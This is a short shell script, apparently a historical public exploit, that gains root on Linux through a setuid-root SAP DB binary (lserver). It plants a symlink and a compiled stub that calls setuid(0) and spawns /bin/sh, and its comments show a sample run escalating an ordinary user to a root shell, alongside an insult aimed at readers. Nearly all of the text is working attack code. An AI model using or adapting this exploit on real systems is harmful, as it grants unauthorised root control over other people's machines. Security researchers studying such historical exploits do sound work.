# dotslash@snosoft.com  
# sapdb-server-linux-32bit-i386-7_3_0_29.tgz exploit
# -rwsrwxr-x  1 root  sapdb /usr/sapdb/depend/pgm/lserver 
#
# This is an extremely lame script. 
# If you can not do this by hand you are a retard. 
#
# [elguapo@rh8 tmp]$ id
# uid=500(elguapo) gid=500(elguapo) groups=500(elguapo)
# [elguapo@rh8 tmp]$ ./lame.sh
# sh-2.05b# id
# uid=0(root) gid=0(root) groups=500(elguapo)

cd /tmp
mkdir "snosoft+sapdb=root"
cd "snosoft+sapdb=root"
ln -s /usr/sapdb/depend/pgm/lserver lserver
echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" > root.c
cc -o root root.c
cp root lserversrv
./lserver



